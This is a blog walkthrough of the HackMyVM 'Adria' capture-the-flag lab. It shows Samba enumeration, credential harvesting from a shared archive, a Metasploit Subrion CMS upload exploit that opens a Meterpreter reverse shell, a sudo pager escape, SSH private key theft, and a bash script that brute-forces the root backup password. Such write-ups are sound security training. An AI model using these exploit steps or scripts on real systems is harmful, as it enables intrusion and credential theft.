Marcin

Marcin

Zajmuję się komputerami od lat 90. (XX wieku). Najpierw był C64, potem Amiga, a od 25 lat PC. Tematy tutaj poruszane będą różne, ale głównie związane z IT i wycieczkami rowerowymi.

Adria - cromiphi

00. Metainfo

Title: Adria
Author: Cromiphi
Release date: 2024-02-23
Download from: HackMyVM
Level: Medium
System: Linux
You’ll learn: CVE, Samba, Bash Blind Injection, Programming

01. Scan

netdiscover -r 172.16.1.0 -P
# _____________________________________________________________________________
#   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
# -----------------------------------------------------------------------------
 172.16.1.190    08:00:27:a6:48:c4      1      60  PCS Systemtechnik GmbH
# 172.16.1.112    b6:11:7c:bb:29:b4      1      60  Unknown vendor
# 172.16.1.140    c8:5a:cf:5f:f5:f1      1      60  HP Inc.
# 172.16.1.229    0c:56:5c:9a:2e:ce      1      60  HyBroad Vision (Hong Kong) Technology Co Ltd
export IP=172.16.1.190

msf6 > db_nmap 172.16.1.190
# [*] Nmap: PORT    STATE SERVICE
# [*] Nmap: 22/tcp  open  ssh
# [*] Nmap: 80/tcp  open  http
# [*] Nmap: 139/tcp open  netbios-ssn
# [*] Nmap: 445/tcp open  microsoft-ds

02. Samba

enum4linux-ng -As $IP
# [*] Enumerating shares
# [+] Found 4 share(s):
# DebianShare:
#  comment: ''
#  type: Disk
# IPC$:
#  comment: IPC Service (Samba 4.17.12-Debian)
#  type: IPC
# nobody:
#  comment: Home Directories
#  type: Disk
# print$:
#  comment: Printer Drivers
#  type: Disk
# [*] Testing share DebianShare
# [+] Mapping: OK, Listing: OK
# [*] Testing share IPC$
# [+] Mapping: OK, Listing: NOT SUPPORTED
# [*] Testing share nobody
# [+] Mapping: DENIED, Listing: N/A
# [*] Testing share print$
# [+] Mapping: DENIED, Listing: N/A

smbclient //$IP/Debianshare
# Password for [WORKGROUP\root]:
# Try "help" to get a list of possible commands.
smb: \> ls
#   .                                   D        0  Mon Dec  4 10:32:45 2023
#   ..                                  D        0  Sat Jul 22 10:10:13 2023
#   configz.zip                         N  2756857  Mon Nov  6 16:56:25 2023

#                19480400 blocks of size 1024. 15694044 blocks available
smb: \> get configz.zip 
# getting file \configz.zip of size 2756857 as configz.zip (48949,8 KiloBytes/sec) (average 48949,9 KiloBytes/sec)
smb: \> exit

03. User and password

unzip configz.zip

find configz/ -exec grep -i pass {} 2>/dev/null \;
# ...
# d-i partman-crypto/passphrase password j******9
# d-i passwd/user-fullname string a***n
# ...

04. CMS Subrion

whatweb $IP/panel
# http://172.16.1.190/panel [301 Moved Permanently] Apache[2.4.57], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.57 (Debian)], IP[172.16.1.190], RedirectLocation[http://172.16.1.190/panel/], Title[301 Moved Permanently]
# http://172.16.1.190/panel/ [200 OK] Apache[2.4.57], Bootstrap, Cookies[INTELLI_7da515443a], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.57 (Debian)], IP[172.16.1.190], JQuery, MetaGenerator[Subrion CMS - Open Source Content Management System], PasswordField[password], PoweredBy[Subrion], Script, Title[Login :: Powered by Subrion 4.2], UncommonHeaders[x-robots-tag], X-UA-Compatible[IE=Edge]

msf6 > search subrion

# Matching Modules
# ================

#   #  Name                                            Disclosure Date  Rank       Check  Description
#   -  ----                                            ---------------  ----       -----  -----------
#   0  exploit/multi/http/subrion_cms_file_upload_rce  2018-11-04       excellent  Yes    Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE


# Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/subrion_cms_file_upload_rce

msf6 > use 0
# [*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set password ******
# password => ******
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set username ******
# username => ******
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set rhosts 172.16.1.190
# rhosts => 172.16.1.190
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run -j
# [*] Exploit running as background job 0.
# [*] Exploit completed, but no session was created.

# [*] Started reverse TCP handler on 172.16.1.89:4444 
# msf6 exploit(multi/http/subrion_cms_file_upload_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
# [*] Checking target web server for a response at: http://172.16.1.190/panel/
# [+] Target is running Subrion CMS.
# [*] Checking Subrion CMS version...
# [+] Target is running Subrion CMS Version 4.2.1.
# [+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
# [*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
# [+] Successfully obtained CSRF token: Yr7kr42uQAuO8PaHQs6TdBMTFIf7TSIavUJW76z2
# [*] Logging in to Subrion Admin Panel at: http://172.16.1.190/panel/ using credentials admin:jojo1989
# [+] Successfully logged in as Administrator.
# [*] Preparing payload...
# [*] Sending POST data...
# [+] Successfully uploaded payload at: http://172.16.1.190/uploads/ladflxrocc.phar
# [*] Executing 'ladflxrocc.phar'... This file will be deleted after execution.
# [*] Sending stage (39927 bytes) to 172.16.1.190
# [*] Meterpreter session 1 opened (172.16.1.89:4444 -> 172.16.1.190:46340) at 2024-03-02 14:52:19 +0100

# msf6 exploit(multi/http/subrion_cms_file_upload_rce) > 
# [+] Successfully executed payload: http://172.16.1.190/uploads/ladflxrocc.phar
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > sessions 

# Active sessions
# ===============

#  Id  Name  Type                   Information       Connection
#  --  ----  ----                   -----------       ----------
#  1         meterpreter php/linux  www-data @ adria  172.16.1.89:4444 -> 172.16.1.190:46340 (172.16.1.190)

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > sessions 1
# [*] Starting interaction with 1...

meterpreter > shell
# Process 1277 created.
# Channel 0 created.
script /dev/null -c bash
#Script started, output log file is '/dev/null'.
www-data@adria:/var/www/html/uploads$

05. User adriana

www-data@adria:/$ sudo -l
# sudo -l
# Matching Defaults entries for www-data on adria:
#    env_reset, mail_badpass,
#    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
#    use_pty

#User www-data may run the following commands on adria:
#    (adriana) NOPASSWD: /usr/bin/scalar

www-data@adria:/$ sudo -uadriana /usr/bin/scalar help
# sudo -uadriana /usr/bin/scalar help
# WARNING: terminal is not fully functional
# Press RETURN to continue 

# SCALAR(1)                         Git Manual                         SCALAR(1)

#NAME
#       scalar - A tool for managing large Git repositories

# SYNOPSIS
#       scalar clone [--single-branch] [--branch <main-branch>] [--full-clone] <u
# rl> [<enlistment>]
#       scalar list
#       scalar register [<enlistment>]
#       scalar unregister [<enlistment>]
#       scalar run ( all | config | commit-graph | fetch | loose-objects | pack-f
# iles ) [<enlistment>]
#       scalar reconfigure [ --all | <enlistment> ]
#       scalar diagnose [<enlistment>]
#       scalar delete <enlistment>

# DESCRIPTION
#       Scalar is a repository management tool that optimizes Git for use in
#       large repositories. Scalar improves performance by configuring advanced
#       Git settings, maintaining repositories in the background, and helping
#       to reduce data sent across the network.

# Manual page scalar(1) line 1 (press h for help or q to quit)!bash
!bash

adriana@adria:/$ id
# id
# uid=1001(adriana) gid=1001(adriana) groups=1001(adriana),100(users)

Download/Copy _id_rsa from /home/adriana/.ssh/id_rsa and connect via ssh from your computer.

ssh -i id_rsa adriana@$IP

05. User root

First way

1. Terminal

wget "https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64" && chmod +x pspy64 && ./pspy64
# 2024/03/02 15:16:54 CMD: UID=0    PID=1577   | /bin/bash /opt/backup 
# 2024/03/02 15:16:54 CMD: UID=0    PID=1579   | /usr/bin/sleep 1 
# 2024/03/02 15:16:55 CMD: UID=0    PID=1580   | /usr/bin/zip -r -e -P ****** /opt/backup.zip /var/www/html 
# 2024/03/02 15:17:01 CMD: UID=0    PID=1582   | /usr/sbin/CRON -f 
# 2024/03/02 15:17:01 CMD: UID=0    PID=1581   | /usr/sbin/CRON -f

2. Terminal

adriana@adria:~$ sudo -l
# Matching Defaults entries for adriana on adria:
#    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

#User adriana may run the following commands on adria:
#    (ALL : ALL) NOPASSWD: /opt/backup
```bash
adriana@adria:~$ sudo /opt/backup
Password: *
#Authorized access
#  adding: var/www/html/ (stored 0%)
#  adding: var/www/html/uploads/ (stored 0%)
# ...

Second way

In this way You don’t need pspy64. This way inspired me by Urkel Grue. Use just script.

#!/bin/bash
#Bash Blind Injection (bbi.sh)
#Kerszi 02.03.2024

digits=({0..9})
alpha=({A..Z} {a..z})
all_num=({0..9} {A..Z} {a..z})
all_chars=({0..9} {A..Z} {a..z} _ -)

counter=0
prefix=""
while true; do
i=${all_num[$counter]}
    sudo /opt/backup <<< $prefix$i* &>/dev/null
    if [[ $? == 0 ]]; then
        prefix+="$i"
        counter=0
        sudo /opt/backup <<< $prefix &>/dev/null
        if [[ $? == 0 ]]; then
            printf "\rPassword: $prefix  ";
            echo
            exit
        fi
    fi
printf "\rPassword: $prefix$i*";

((counter++))
done

adriana@adria:~$ ./bbi.sh   
#Password: 8eNctPo*

```bash
adriana@adria:~$ time ./bbi.sh
#Password: 8eNct***************************

real    1m29.900s
user    0m3.532s
sys     0m2.793s

You have password for root.

Zostaw komentarz

Także może Ci się spodobać